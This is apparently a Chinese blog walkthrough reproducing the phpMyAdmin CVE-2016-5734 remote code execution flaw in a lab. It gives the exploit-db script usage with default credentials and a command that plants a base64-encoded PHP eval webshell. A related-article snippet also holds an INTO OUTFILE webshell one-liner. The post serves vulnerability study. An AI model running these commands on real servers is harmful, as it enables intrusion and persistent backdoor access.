phpmyadin CVE-2016-5734漏洞复现

最新推荐文章于 2024-05-29 16:41:13 发布

原创最新推荐文章于 2024-05-29 16:41:13 发布 · 264 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#mysql

漏洞复现专栏收录该内容

18 篇文章

订阅专栏

本文介绍了通过利用脚本进行CVE-2016-57漏洞的复现过程，包括下载并使用脚本对目标服务器发起攻击，最终实现远程代码执行及木马文件的写入。

搭建

在这里插入图片描述

漏洞复现

下载利用脚本：
https://www.exploit-db.com/exploits/40185
脚本利用方法：

-u 账号
-p 密码
-c 执行代码(php代码) 默认执行uname -a

python 40185.py -u root -p root http://192.168.154.3:8080

在这里插入图片描述
成功读取到文件
接下来写入木马

 python .\CVE-2016-57.py -u root --pwd="root" http://192.168.1.101:8080 -c "file_put_contents('whh.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1Rbcm9vdF0pOz8+'));"

在这里插入图片描述

上蚁剑

连接成功

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

. iDea.

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

CVE-2016-5734 Phpmyadmin后台代码执行漏洞复现

alert['Hello World']

01-24

2849

目录漏洞描述影响版本漏洞环境搭建漏洞分析漏洞利用漏洞加固参考链接漏洞描述 CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ，意即phpMyAdmin认证用户的远程代码执行，根据描述可知受影响的phpMyAdmin所有的 4.6.x 版本（直至 4.6.3），4.4.x 版本（直至 4.4.15.7），和 4.0.x 版本（直至 4.0.10.16）。 CVE的作者利用在php 5

PhpMyAdmin远程执行代码漏洞复现（CVE-2016-5734）

千寻的博客

03-21

1860

phpMyAdmin`中存在安全漏洞，该漏洞源于程序没有正确选择分隔符来避免使用`preg_replace e`修饰符。远程攻击者可借助特制的字符串利用该漏洞执行任意PHP代码。

参与评论您还未登录，请先登录后发表或查看评论

CVE-2016-5734漏洞复现

qq_56426046的博客

09-11

567

在PHP5.4.7以前，preg_replace的第一个参数可以利用\0进行截断，并将正则模式修改为e。众所周知，e模式的正则支持执行代码，此时将可构造一个任意代码执行漏洞。

PhpMyAdmin 远程代码执行漏洞 (CVE-2016-5734)复现

君莫hacker的博客

09-12

861

0x01 漏洞介绍漏洞描述 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在其查找并替换字符串功能中，将用户输入的信息拼接进preg_replace函数第一个参数中。在PHP5.4.7以前，preg_replace的第一个参数可以利用\0进行截断，并将正则模式修改为e。众所周知，e模式的正则支持执行代码，此时将可构造一个任意代码执行漏洞。漏洞编号 CVE-2016-5734 受影响版本 4.0.10.16之前4.0.x版本 4.4.15.7之前4.4.x版本

（CVE-2016-5734）PHP反序列化漏洞复现

weixin_52777165的博客

01-05

878

漏洞简介 Phpmyadmin是一个以php为基础，以Web-Base方式架构在网站主机上的MySQL的数据库管理工具，让管理者可以使用Web接口管理MySQL数据库。借由次Web接口可以成为一个简单方式输入SQL语法的较佳途径。其优势就是可以通过Web界面来远程管理方便建立、修改、删除数据库及资料表影响版本 Phpmyadmin -> 4.0.10.16之前的4.0.x版本 4.4.15.7 之前的 4.4.x版本 4.6.3之前的 4.6.x版本 Php版本： 4.3.0 ~5.4.6 Php

【phpmyadmin漏洞复现】CVE-2016-5734远程代码执行漏洞+CVE-2018-12613文件包含漏洞+WooYun-2016-199433反序列化漏洞

serendipity1130的博客

09-01

1087

CVE-2016-5734 1.访问8080端口，用弱口令root root登录 2. 在Kali中有自带的EXP： searchsploit phpmyadmin 3.进入该目录：/usr/share/exploitdb/exploits/php/webapps，通过EXP写入一句话木马： python3 40185.py -u root --pwd="root" http://192.168.225.139:8080/ -c "file_put_contents('shell.php'

phpmyadmin-CVE-2016-5734漏洞复现

chenyy95的博客

05-29

420

CVE漏洞复现

CVE-2016-3720

02-22

这个项目是CVE-2016-3720 Demo，为了避免搭建环境，大佬们可以直接获取到这个资源。相对应的分析文章是：https://blog.youkuaiyun.com/qq_36869808 可以在这篇文章看到分析的内容，感谢~当然如果非常需要这个资源，也...

DirtyCow提权漏洞复现（CVE-2016-5195）1

08-08

脏牛（Dirty Cow）漏洞，全称为“竞争条件写入时复制”（Copy-on-Write Race Condition），在2016年被发现，其安全漏洞编号为CVE-2016-5195。这个漏洞主要影响的是Linux内核，特别是从2007年的2.6.22版本到修复前的...

解决OpenSSL "SSL-Death-Alert" 拒绝服务漏洞(CVE-2016-8610)安全漏洞，升级OpenSSL到OpenSSL 1.1.0k

10-25

最近放开了https服务，安全组扫描出新的漏洞，现对原OpenSSL 1.0.1g版本升级到OpenSSL 1.1.0k，同时重新编译OpenSSH及nginx，在此提供升级脚本，仅供参考

phpmyadmin漏洞分析复现

weixin_43047908的博客

08-19

1594

目录前言环境搭建漏洞复现CVE-2016-5734CVE-2018-12613 前言 phpMyAdmin 是一个以PHP为基础，以Web-Base方式架构在网站主机上的MySQL的数据库管理工具，让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径，尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行，但是您可以在任何地方使用这些程式产生的HTML页面，也就是于远端管理MySQL

buuctf [PHPMYADMIN]CVE-2016-5734

qq_1873822的博客

03-19

810

漏洞简介 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在其查找并替换字符串功能中，将用户输入的信息拼接进preg_replace函数第一个参数中。在PHP5.4.7以前，preg_replace的第一个参数可以利用\0进行截断，并将正则模式修改为e。众所周知，e模式的正则支持执行代码，此时将可构造一个任意代码执行漏洞。以下版本受到影响： 4.0.10.16之前4.0.x版本 4.4.15.7之前4.4.x版本 4.6.3之前4.6.x版本（实际上由于该版本要求PHP5.5+，

phpMyAdmin远程代码执行（CVE-2016-5734）

weixin_41182861的博客

01-03

1098

前言 phpMyAdmin是phpMyAdmin团队开发的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库，创建、删除、修改数据库表，执行SQL脚本命令等。 phpMyAdmin中存在安全漏洞，该漏洞源于程序没有正确选择分隔符来避免使用preg_replace e修饰符。远程攻击者可借助特制的字符串利用该漏洞执行任意PHP代码。受影响版本 phpMyAdmin 4.0...

phpmyadmin远程代码执行漏洞（CVE-2016-5734）

笑花大王

03-27

1060

简介环境复现：https://github.com/vulhub/vulhub 线上平台:榆林学院内可使用协会内部的网络安全实验平台 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。影响版本 phpmyadmin4.3.0-4.6.2 代码审计待更新.... 漏洞利用漏洞利用py #!/usr/bin/env python """cve-2016-...

phpmyadmin系列渗透思路连载(一)

PANDA墨森的博客

06-23

993

当拿到phpmyadin的站点后，我一般会尝试一下几种攻击手法： 1、通过弱口令进入后台，尝试into outfile写入一句话条件：(1)有写的权限 (2)知道web绝对路径 (3)web路径可写(一般upload目录可写) show variables like '%secure%'; #如果为null就不可写，=""就可写 select '<?php eval($_POST[cmd]);?>' into outfile 'E:/www/xx/php'; #...

[CVE-2016-5734]phpmyadmin(4.3.0-4.6.2)命令执行漏洞复现

https://www.cnblogs.com/zpchcbd/

08-30

732

触发原因：preg_replace函数引发的触发原理：preg_replace漏洞触发有两个前提： 01：第一个参数需要e标识符，有了它可以执行第二个参数的命令 02：第一个参数需要在第三个参数中的中有匹配，不然echo会返回第三个参数而不执行命令，举个例子：影响漏洞版本：漏洞复现： 1、docker搭建 docker-compose up -d 2、漏洞利用代码：python php...

CVE-2016-5734（phpMyAdmin远程代码执行）漏洞复现

没事我溜达

04-06

5878

漏洞名称 phpMyAdmin远程代码执行漏洞（CVE-2016-5734）发布时间 2016年06月21日漏洞编号 CVE-2016-5734 威胁类型远程代码执行危害级别严重影响版本 4.0.10.16之前4.0.x版本 - 4.4.15.7之前4...

CVE-2016-5734远程代码执行模拟从外网进入内网

大方子

08-29

2211

【自己直接从自己的笔记中复制来的，若出现排版问题请直接查看原笔记】文档：CVE-2016-5734远程代码执行模拟从外网?.. 链接：http://note.youdao.com/noteshare?id=fbf75e67cc1573d01982bd923ac6c179&sub=8FB1C4FA3A1A4A45BD694D18C59391B8 前言最近学习各种漏洞，...

cve-2016-0777漏洞复现